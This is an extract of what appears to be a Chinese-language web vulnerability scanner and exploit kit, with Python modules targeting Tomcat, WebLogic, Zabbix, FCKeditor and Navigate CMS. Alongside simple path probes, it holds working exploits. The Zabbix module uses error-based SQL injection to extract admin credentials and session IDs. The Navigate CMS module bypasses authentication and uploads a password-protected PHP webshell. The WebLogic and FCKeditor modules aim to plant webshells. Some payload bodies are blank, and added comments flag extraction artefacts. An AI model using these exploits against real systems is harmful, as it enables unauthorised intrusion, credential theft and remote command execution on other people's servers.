6 | moon.py -u tomcat http://127.0.0.1:8080
7 | 影响范围:Tomcat: 全版本
8 | session操纵漏洞:Apache Tomcat默认安装包含”/examples”目录,里面存着众多的样例,
9 | 其中session样例(/examples/servlets/servlet/SessionExample)允许用户对session进行操纵。
10 | 因为session是全局通用的,所以用户可以通过操纵session获取管理员权限。
11 | (不一定都是全局的,如果path只在examples下,那就无法利用)。
12 | 利用此漏洞需要知道相关后台登录后的session键值对,然后写入到session中,利用条件苛刻。
13 | https://cloud.tencent.com/info/2e03f26090fe592b6c7aa933dd6c0f94.html
14 | 解决办法:安装完tomcat后,删除$CATALINA_HOME/webapps下默认的所有目录文件* rm -rf /srv/apache-tomcat/webapps/*
15 | '''
16 |
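def attack(URL):
    """Report which default Tomcat resources (examples, docs, manager, ...) answer.

    GETs every path in ``urls`` and, for a 200, 304 or 401 reply, prints the
    status, the body length and the URL.  A 401 on the manager paths means
    the app is deployed; the length is printed because some sites answer
    every path with a uniform 200 "not found" page, so size is the only way
    to tell a real hit from the catch-all.  Read-only; prints and returns
    None.  Hardening per the module docstring: remove the default webapps.

    URL -- base URL of the target without a trailing slash.

    Fix vs. the original: the test ``status == 200 or 304 or 401`` was always
    true (``304`` is a truthy literal), so every reply including genuine 404s
    was printed; membership in ``interesting`` is what was meant.  Requests
    now also carry a timeout.
    """
    urls = (
        '/examples/servlets/servlet/SessionExample',  # 200
        '/examples/',  # 304
        '/docs/',  # 304
        '/docs/BUILDING.txt',
        '/docs/RUNNING.txt',
        '/manager/html',  # 401
        '/host-manager/html',  # 401
        '/icons/',
        '/manual/',
        '/examples/jsp/snp/snoop.jsp',
        '/lib/catalina.jar',
        '/conf/tomcat-users.xsd',
        '/bin/catalina-tasks.xml',
    )
    interesting = {200, 304, 401}

    print('[+]开始检测-Tomcat-example_vulnerability。[+]')
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    headers = {"User-Agent": user_agent}
    for path in urls:
        url = URL + path
        try:
            verify_response = requests.get(url, headers=headers, timeout=10)
        except requests.RequestException as exc:
            print("Someerror!", exc)
            continue
        if verify_response.status_code in interesting:
            print('页面返回状态码:' + str(verify_response.status_code) + ' ' + '页面返回大小为:' + str(len(verify_response.text)) + ' ' + url)
    print('[+]检测结束-Tomcat-example_vulnerability。[+]')
    print('\n')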
53 |
if __name__ == "__main__":
    # Stand-alone entry point.  attack(URL) requires the target URL, so this
    # call raises TypeError; the module is normally driven through moon.py's
    # wrappers, which pass the target in.
    attack()
56 |
--------------------------------------------------------------------------------
/weblogic/CVE_2017_3506.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # auther:dayu
3 | import requests
4 | import re
5 |
# Request headers shared by attack(): a browser-like User-Agent and Accept
# set, plus the text/xml content type for the POST body.
heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Content-Type': 'text/xml;charset=UTF-8'
}
12 |
13 |
def attack(url):
    """Check for CVE-2017-3506 (WebLogic WLS-WSAT XMLDecoder) and print a verdict.

    Normalises *url* (prefixes http:// when no scheme is given), appends
    /wls-wsat/CoordinatorPortType, POSTs ``post_str`` with the module-level
    ``heads`` and searches the reply for a SOAP faultstring.  Prints one of
    two verdict lines; returns None.  ``post_str`` is blank in this listing.

    url -- target host or base URL.
    """
    if not url.startswith("http"):
        url = "http://" + url
    # Always true once the scheme prefix is present, so the path is always appended.
    if "/" in url:
        url += '/wls-wsat/CoordinatorPortType'
    post_str = '''










    '''

    print('[+]开始检测-Weblogic-CVE-2017-3506。[+]')
    try:
        # verify=False skips TLS certificate checks (lab targets are often
        # self-signed); timeout=5 bounds the wait on a silent host.
        response = requests.post(
            url, data=post_str, verify=False, timeout=5, headers=heads)
        response = response.text
        # NOTE(review): as listed, the pattern matches only the closing
        # </faultstring> tag (plus any literal dots before it), so neither
        # substring test below can succeed on the matched text; the opening
        # part of the pattern may have been lost in extraction — compare with
        # the original file.
        response = re.search(
            r"\.*\<\/faultstring\>", response).group(0)
    except Exception:
        # Connection error, timeout, or no faultstring in the reply.
        response = ""

    # NOTE(review): `"0" in response` would match any faultstring containing a
    # zero digit, so this verdict is prone to false positives.
    if 'java.lang.ProcessBuilder' in response or "0" in response:
        print('[+]发现 CVE-2017-3506 !!!')
    else:
        print('[-]未发现 CVE-2017-3506 ')
    print('[+]检测结束-Weblogic-CVE-2017-3506。[+]')
    print('\n')
61 |
62 |
if __name__ == '__main__':
    # Stand-alone entry point.  attack(url) requires the target, so this call
    # raises TypeError; the module is normally driven through moon.py's
    # wrappers, which pass the target in.
    attack()
65 |
--------------------------------------------------------------------------------
/weblogic/CVE_2017_10271.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import sys
3 | import requests
4 | import time
5 | from random import *
6 | import string
7 |
8 |
9 |
10 | '''
11 | Usage:
12 | moon.py -u weblogic http://127.0.0.1:7001
13 | Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0
14 | Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
15 | 访问:http://域名:默认weblogic端口/wls-wsat/CoordinatorPortType ,如果存在相关内容则存在漏洞
16 | '''
17 |
def gen_shell():
    """Return a random ASCII alphanumeric string of 4 to 12 characters.

    Letters (both cases) and digits are drawn uniformly with ``choice``;
    the length is drawn with ``randint`` and is inclusive of both bounds.
    Not seeded, so each call differs.
    """
    alphabet = string.ascii_letters + string.digits
    length = randint(4, 12)
    return "".join(choice(alphabet) for _ in range(length))
24 |
25 |
def attack(URL):
    """Check for CVE-2017-10271 (WLS-WSAT XMLDecoder deserialisation) and print the result.

    POSTs ``data`` as text/xml to /wls-wsat/CoordinatorPortType, prints the
    status (the tool treats 500 as success), then GETs
    /bea_wls_internal/<shellname>.jsp and reports whether it answers 200.
    ``data`` is blank in this listing, so as written the POST body is only
    whitespace and the follow-up GET will normally report failure.  Prints
    only; returns None.

    URL -- base URL of the WebLogic server without a trailing slash.
    """
    print('[+]开始检测-Weblogic-CVE-2017-10271。[+]')
    shellname = gen_shell()  # random name that the follow-up GET looks for
    data = """









    """
    url = f'{URL}/wls-wsat/CoordinatorPortType'
    #proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}
    headers = {"Content-Type":'text/xml',
               "User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'}
    try:
        # No timeout on either request: a silent host blocks here indefinitely.
        r = requests.post(url,data=data, headers=headers)
        print('上传返回值为500为成功。上传返回值为:' + str(r.status_code))
        try:
            r1 = requests.get(f'{URL}/bea_wls_internal/{shellname}.jsp')
            if r1.status_code == 200:
                print(f'webshell地址为:{URL}/bea_wls_internal/{shellname}.jsp?pwd=fff&cmd=whoami')
            else:
                print('获取shell失败。')
        except:
            # Bare except: any failure of the second GET is reported the same way.
            print('获取shell失败。')
    except Exception:
        print('访问网页失败,未发现-Weblogic-CVE-2017-10271。')

    print('[+]检测结束-Weblogic-CVE-2017-10271。[+]')
    print('\n')
80 |
if __name__ == "__main__":
    # Stand-alone entry point.  attack(URL) requires the target URL, so this
    # call raises TypeError; the module is normally driven through moon.py's
    # wrappers, which pass the target in.
    attack()
--------------------------------------------------------------------------------
/zabbix_vuln/Authentication_Bypass.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 |
4 | '''
5 | Usage:
6 | moon.py -u zabbix http://127.0.0.1:8080
7 | 相关链接:https://cxsecurity.com/issue/WLB-2019100030
8 | 这个漏洞的话,姑且看看吧。测试的时候手里环境不是很全,可能有问题,上面原始脚本是perl的,可以试一下
9 | 影响范围:Zabbix <= 4.4
10 | The target is vulnerable. Try to open these links:
11 | https://TARGET/zabbix/zabbix.php?action=dashboard.view
12 | https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1
13 | https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1
14 | https://TARGET/zabbix/overview.php?ddreset=1
15 | https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1
16 | https://TARGET/zabbix/latest.php?ddreset=1
17 | https://TARGET/zabbix/charts.php?ddreset=1
18 | https://TARGET/zabbix/screens.php?ddreset=1
19 | https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1
20 | https://TARGET/zabbix/srv_status.php?ddreset=1
21 | https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1
22 | https://TARGET/zabbix/hostinventories.php?ddreset=1
23 | https://TARGET/zabbix/report2.php?ddreset=1
24 | https://TARGET/zabbix/toptriggers.php?ddreset=1
25 | https://TARGET/zabbix/zabbix.php?action=dashboard.list
26 | https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1
27 | '''
28 |
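def attack(URL):
    """Report which Zabbix frontend pages answer without a session (Zabbix <= 4.4 check).

    GETs every path in ``urls`` — the dashboard/report pages from the
    advisory, most with ``ddreset=1`` — carrying no credentials, and for a
    200, 304 or 401 reply prints the status, the body length and the URL for
    manual review.  The length is printed because some sites answer every
    path with a uniform 200 "not found" page, so size is the only way to tell
    a real page from the catch-all.  Read-only; prints and returns None.

    URL -- base URL of the Zabbix frontend without a trailing slash.

    Fix vs. the original: the test ``status == 200 or 304 or 401`` was always
    true (``304`` is a truthy literal), so every reply including genuine 404s
    was printed; membership in ``interesting`` is what was meant.  Requests
    now also carry a timeout.
    """
    urls = (
        '/zabbix.php?action=dashboard.view',
        '/zabbix.php?action=dashboard.view&ddreset=1',
        '/zabbix.php?action=problem.view&ddreset=1',
        '/overview.php?ddreset=1',
        '/zabbix.php?action=web.view&ddreset=1',
        '/latest.php?ddreset=1',
        '/charts.php?ddreset=1',
        '/screens.php?ddreset=1',
        '/zabbix.php?action=map.view&ddreset=1',
        '/srv_status.php?ddreset=1',
        '/hostinventoriesoverview.php?ddreset=1',
        '/hostinventories.php?ddreset=1',
        '/report2.php?ddreset=1',
        '/toptriggers.php?ddreset=1',
        '/zabbix.php?action=dashboard.list',
        '/zabbix.php?action=dashboard.view&dashboardid=1',
    )
    interesting = {200, 304, 401}

    print('[+]开始检测- Zabbix 4.2 - Authentication Bypass。[+]')
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    headers = {"User-Agent": user_agent}
    for path in urls:
        url = URL + path
        try:
            verify_response = requests.get(url, headers=headers, timeout=10)
        except requests.RequestException as exc:
            print("Someerror!", exc)
            continue
        if verify_response.status_code in interesting:
            print('页面返回状态码:' + str(verify_response.status_code) + ' ' + '页面返回大小为:' + str(len(verify_response.text)) + ' ' + url)
    print('[+]检测结束-Zabbix 4.2 - Authentication Bypass。[+]')
    print('\n')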
68 |
if __name__ == "__main__":
    # Stand-alone entry point.  attack(URL) requires the target URL, so this
    # call raises TypeError; the module is normally driven through moon.py's
    # wrappers, which pass the target in.
    attack()
71 |
--------------------------------------------------------------------------------
/zabbix_vuln/zabbix_sql_CVE_2016_10134.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import re
3 | import requests
4 |
5 | '''
6 | Usage:
7 | moon.py -u zabbix http://x.x.x.x:xx
8 | zabbix的 profileIdx2 参数存在问题,存在sql注入。
9 | 影响范围,3.0.3 成功, 3.2.6 失败。
10 | 禁用guest账户,升级版本
11 | '''
12 |
13 |
def attack(URL):
    """Check for CVE-2016-10134, the SQL injection in Zabbix's jsrpc.php ``profileIdx2`` parameter.

    Three GETs against /jsrpc.php with a fixed ``sid``: the first carries a
    stray quote in ``profileIdx2`` and only confirms the page is reachable;
    if it raised nothing, two further requests carry an error-based
    injection and ``result_reg`` pulls the leaked value out of the MySQL
    "Duplicate entry" message — a credential pair from ``users``, then a
    ``sessionid`` from ``sessions``.  Everything is printed; returns None.
    Per the module docstring the fix is to disable the guest account and
    upgrade; for detection, the tell-tale is a jsrpc.php request whose
    profileIdx2 value contains a quote or SQL.

    URL -- base URL of the Zabbix frontend without a trailing slash.
    """
    print('[+]开始检测-zabbix_sql-CVE-2016-10134。[+]')
    user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    headers={"User-Agent":user_agent}
    # NOTE(review): `×tamp` here and below looks like an extraction artefact
    # of `&timestamp` (the `&times` entity) — compare with the original file.
    url = URL + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
    try:
        # No timeout: a silent host blocks here indefinitely.
        res = requests.get(url,headers=headers)
        xresponse = res.text  # unused; the reachability check is the request itself
        print('访问URL成功,开始进行zabbix_sql注入漏洞检测。')
    except Exception:
        print('[-]未发现zabbix_sql注入漏洞。')
    else:
        try:
            url = URL + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
            res = requests.get(url, headers=headers)
            response = res.text
            result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
            results = result_reg.findall(response)
            # IndexError when nothing matched -> reported by the except below.
            print('管理员、用户名密码为:'+results[0])
        except Exception:
            print('[-]获取用户名及密码失败。')
        try:
            url = URL + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
            res = requests.get(url, headers=headers)
            response = res.text
            result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
            results = result_reg.findall(response)
            print('SessionID为:' + results[0])
        except Exception:
            print('[-]获取SessionID失败。')
    print('[+]检测结束-zabbix_sql-CVE-2016-10134。[+]')
    print('\n')
46 |
47 |
if __name__ == '__main__':
    # Stand-alone entry point.  attack(URL) requires the target URL, so this
    # call raises TypeError; the module is normally driven through moon.py's
    # wrappers, which pass the target in.
    attack()
50 |
--------------------------------------------------------------------------------
/fckeditor/fckeditor_version.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | from bs4 import BeautifulSoup
4 | import requests
5 | import re
6 |
7 | '''
8 | Usage:
9 | moon.py -u fck http://127.0.0.1:8080 #此脚本需更新,效果较差
10 |
11 | '''
12 |
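def attack(URL):
    """Print the FCKeditor version and the first file-manager connector that answers.

    Step 1 GETs ``/_whatsnew.html`` and prints the text of its first <h3>
    (the release heading).  Step 2 GETs each connector URL in ``urls`` and
    prints the match of ``path_pattern`` against the first reply that yields
    one.  Read-only; prints and returns None.  The module docstring already
    notes the script needs rework and works poorly on newer versions.

    URL -- base URL of the target without a trailing slash.

    Fixes vs. the original: a missing comma after the
    ``/editor/filemanager/connectors/jsp/connector.jsp`` entry silently glued
    it to the next literal, so the three ``/FCKeditor/...`` paths were never
    requested; requests now carry a timeout; and a failure on one connector
    URL no longer abandons the rest of the list.

    NOTE(review): ``path_pattern`` is empty in this listing — it appears to
    have been lost when the file was extracted — so it matches the empty
    string at offset 0 of any reply and the printed path is blank.  Restore
    the pattern from the original file before relying on step 2.
    """
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    headers = {"User-Agent": user_agent}
    timeout = 10  # seconds per request

    # Version banner.
    try:
        verify_response = requests.get(URL + '/_whatsnew.html', headers=headers, timeout=timeout)
        soup = BeautifulSoup(verify_response.content, "lxml")
        print("[+]此Fckeditor版本为:" + soup.h3.string.strip())
    except Exception:
        # Request errors and a page without an <h3> both end here; best-effort as before.
        print("[-]获取Fckeditor版本错误!!")

    # Upload-folder lookup via the connector endpoints.
    urls = (
        '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
        '/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
        '/editor/filemanager/browser/default/connectors/cfm/connector.cfm?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
        '/editor/filemanager/browser/default/connectors/lasso/connector.lasso?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
        '/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
        '/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
        '/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
        '/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
        '/editor/filemanager/connectors/cfm/connector.cfm?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
        '/editor/filemanager/connectors/lasso/connector.lasso?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
        '/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
        '/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
        '/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F',
        '/FCKeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F',
        '/FCKeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F',
    )
    path_pattern = re.compile(r'')
    found = False
    for path in urls:
        url = URL + path
        try:
            verify_response = requests.get(url, headers=headers, timeout=timeout)
            match = path_pattern.search(verify_response.content.decode('utf-8'))
        except Exception:
            # Unreachable endpoint or undecodable body: try the next connector.
            continue
        if match is None:
            continue
        print("[+]此Fckeditor上传路径为:" + match.group())
        found = True
        break
    if not found:
        print('[-]获取此Fckeditor上传路径错误')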
56 |
57 | #print('[+]获取文件上传目录2.5 2.6:'+URL+'/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F')
58 |
59 |
60 |
if __name__ == "__main__":
    # Stand-alone entry point.  attack(URL) requires the target URL, so this
    # call raises TypeError; the module is normally driven through moon.py's
    # wrappers, which pass the target in.
    attack()
63 |
64 |
--------------------------------------------------------------------------------
/navigate_vuln/navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 | from requests_toolbelt.multipart.encoder import MultipartEncoder
4 | import sys
5 |
6 | r'''
7 | Usage:
8 | moon.py -u navigate http://x.x.x.x:xx
9 | V2.8版本测试存在此漏洞。
10 | 参考 https://www.exploit-db.com/exploits/45561/
11 | https://github.com/rapid7/metasploit-framework/pull/10704
12 | 上面msf的利用脚本会向该cms的/navigate/navigate_info.php文件写入shell,以下脚本也是利用的这个思路.
13 | 因此如果/navigate/navigate_info.php文件不存在,会造成shell写入失败。
14 | Navigate CMS v2.8 测试成功
15 | 绕过登录限制
16 | cookie' => 'navigate-user=\" OR TRUE--%20'
17 | '''
18 |
19 |
def attack(URL):
    """Check for CVE-2018-17553 (Navigate CMS 2.8 login bypass + file write) and print the outcome.

    Step 1: GET login.php at two candidate paths with the crafted
    ``navigate-user`` cookie and redirects disabled; a 302 is taken as a
    bypass and the first response cookie's value is kept in the module
    global ``Session_id``.  Step 2 (the try's ``else``, reached only when
    step 1 raised nothing): if /navigate/navigate_info.php answers 200, POST
    the local ``88.php`` through navigate_upload.php with that session id
    and print the resulting address and password.  Prints only; returns
    None.  For defenders, the request pattern to alert on is a login.php
    hit whose navigate-user cookie carries a quote/SQL fragment followed by
    a navigate_upload.php POST whose ``id`` parameter traverses directories.

    URL -- base URL of the site without a trailing slash.
    """
    print('[+]开始检测-navigate_Unauthenticated_Remote_Code_Execution_CVE-2018-17553。[+]')
    user_agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
    headers={"User-Agent":user_agent}
    try:
        urls = [URL + '/login.php',URL+'/navigate/login.php']
        for url in urls:
            print('检测的URL为:'+url)
            cookies = {'navigate-user':r'\" OR TRUE--%20'}
            # verify=False skips TLS checks; allow_redirects=False so the 302 itself is observed.
            r = requests.get(url,headers=headers,cookies=cookies,verify=False,allow_redirects=False)
            if r.status_code == 302:
                print('[+]返回值为:'+str(r.status_code)+' 可能存在漏洞。')
                #print(r.cookies.items()[0][1])#获取session_id
                # Session_id is only ever bound here; if no 302 was seen, the
                # f-string in step 2 raises NameError, swallowed by its bare except.
                global Session_id
                Session_id = r.cookies.items()[0][1]
            else:
                print('[-]返回值为:' + str(r.status_code) + ' 不存在漏洞。')
    except:
        print('[-]未发现该漏洞。!')
    else:
        try:
            url = URL + '/navigate/navigate_info.php'
            r = requests.get(url)
            scode = r.status_code
            if scode == 200:
                print('[+]访问/navigate/navigate_info.php成功,开始写入。')
                try:
                    # First 33 characters of this script's own path are taken as
                    # the project directory — tied to one install location, and
                    # the separators below are Windows-only (see the README's
                    # hard-coded-path caveat).
                    pwd = sys.argv[0][:33] # 获取当前文件夹的路径
                    url = URL + f'/navigate/navigate_upload.php?id=../../../navigate_info.php&session_id={Session_id}&engine=picnik'
                    # The opened file handle is never closed explicitly.
                    m = MultipartEncoder(fields={
                        'Content-Disposition': 'form-data; name="file"; filename="tCc2QJ7PUxSC"',
                        'file': ('shellname', open(f'{pwd}\\navigate_vuln\\88.php', 'rb'), 'image/jpeg'),
                    })
                    headers = {
                        'Content-Type': m.content_type,
                        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36',
                    }
                    # The POST's status is not checked; success is assumed.
                    r = requests.post(url, data=m, headers=headers)
                    #print(r.status_code) #值为200上传正常
                    print('一句话地址为:' + URL + '/navigate/navigate_info.php')
                    print('密码为:' + 'tBjyWW3456tBjyWWtBjyWW87ttBjyWW')
                except:
                    print('上传shell发生错误。')
            else:
                print('[-]访问/navigate/navigate_info.php失败,无法进行shell写入。')
        except:
            print('[-]访问/navigate/navigate_info.php发生错误。')

    print('[+]检测结束-navigate_Unauthenticated_Remote_Code_Execution_CVE-2018-17553。[+]')
    print('\n')
70 |
71 |
if __name__ == '__main__':
    # Stand-alone entry point.  attack(URL) requires the target URL, so this
    # call raises TypeError; the module is normally driven through moon.py's
    # wrappers, which pass the target in.
    attack()
74 |
--------------------------------------------------------------------------------
/fckeditor/fckeditor_dangerfile.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 |
4 | '''
5 | Usage:
6 | moon.py -u fck http://127.0.0.1:8080
7 | '''
8 |
9 |
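def attack(URL):
    """Report which FCKeditor file-manager, browser and upload-test pages exist.

    GETs every path in ``urls`` and prints the URL of each that answers 200.
    Read-only: the mere presence of these browser/connector/test pages means
    the file manager is reachable from the outside, which is the finding;
    nothing is uploaded.  Prints and returns None.

    URL -- base URL of the target without a trailing slash.

    Change vs. the original: requests carry a timeout so a silent host
    cannot stall the scan indefinitely, and the error line names the cause.
    """
    urls = (
        '/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
        '/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp',
        '/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php',
        '/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp',
        '/FCKeditor/editor/filemanager/browser/default/connectors/test.html',
        '/FCKeditor/editor/filemanager/upload/test.html',
        '/FCKeditor/editor/filemanager/connectors/test.html',
        '/FCKeditor/editor/filemanager/connectors/uploadtest.html',
        '/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector',
        '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
        '/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
        '/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
        '/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp',
        '/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/jsp/connector.jsp',
        '/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/php/connector.php',
        '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php',
        '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fjsp%2Fconnector.jsp',
        '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fasp%2Fconnector.asp',
        '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp',
        '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp',
        '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php',
        '/editor/filemanager/browser/default/connectors/test.html',
        '/editor/filemanager/upload/test.html',
        '/editor/filemanager/connectors/test.html',
        '/editor/filemanager/connectors/uploadtest.html',
        '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector',
    )

    print('[+]开始检测-Fckeditor敏感目录。[+]')
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    headers = {"User-Agent": user_agent}
    for path in urls:
        url = URL + path
        try:
            verify_response = requests.get(url, headers=headers, timeout=10)
        except requests.RequestException as exc:
            print("Someerror!", exc)
            continue
        # Only a 200 is reported; redirects and errors are silently skipped as before.
        if verify_response.status_code == 200:
            print('存在此页面:' + url)
    print('[+]检测结束-Fckeditor敏感目录。[+]')
    print('\n')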
55 |
56 |
if __name__ == "__main__":
    # Stand-alone entry point.  attack(URL) requires the target URL, so this
    # call raises TypeError; the module is normally driven through moon.py's
    # wrappers, which pass the target in.
    attack()
59 |
--------------------------------------------------------------------------------
/fckeditor/fckeditor_getshell.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | from requests_toolbelt.multipart.encoder import MultipartEncoder
3 | import requests
4 | import string
5 | from random import *
6 | import re
7 | import sys
8 |
9 | '''
10 | Usage:
11 | moon.py -u fck http://127.0.0.1:8080
12 | fck <2.4.x版本(也就是2.4.x及以下)的File参数时为黑名单验证,可以通过上传.asa、.cer、.asp;jpg(针对IIS6)。
13 | 如果asa、cer不被解析,还可以传.asp[空格]。传的方法就是抓包然后在数据包里的文件名后填个空格。
14 | 实际测试过程中还是上传asa可以,以下脚本也基于asa上传
15 | fck编辑器如要上传文件需配置相关项目,如果出现上传成功且获取上传路径失败,就可能是配置不允许上传。
16 | 返回包出现这类文字基本上就是设置不允许上传:This connector is disabled. Please check the
17 | '''
18 |
19 |
def gen_shell():
    """Return a random ASCII alphanumeric string of 4 to 12 characters.

    Letters (both cases) and digits are drawn uniformly with ``choice``;
    the length is drawn with ``randint`` and is inclusive of both bounds.
    Not seeded, so each call differs.
    """
    alphabet = string.ascii_letters + string.digits
    length = randint(4, 12)
    return "".join(choice(alphabet) for _ in range(length))
26 |
27 |
def geturl(URL):
    """Return the upload folder reported by the first FCKeditor connector that answers, else None.

    GETs each connector URL in ``urls`` (one per FCKeditor generation, see
    the inline comments), decodes the body as UTF-8, and returns group 1 of
    ``soup`` after printing it.  Any exception on a URL is swallowed and the
    next URL is tried; falling off the loop returns None implicitly.

    NOTE(review): the search pattern is empty in this listing (it appears to
    have been lost in extraction), so ``.group(1)`` raises IndexError (no
    such group) on every URL, which the except swallows — as listed, the
    function always returns None.  The ``break`` after ``return`` is
    unreachable.

    URL -- base URL of the target without a trailing slash.
    """
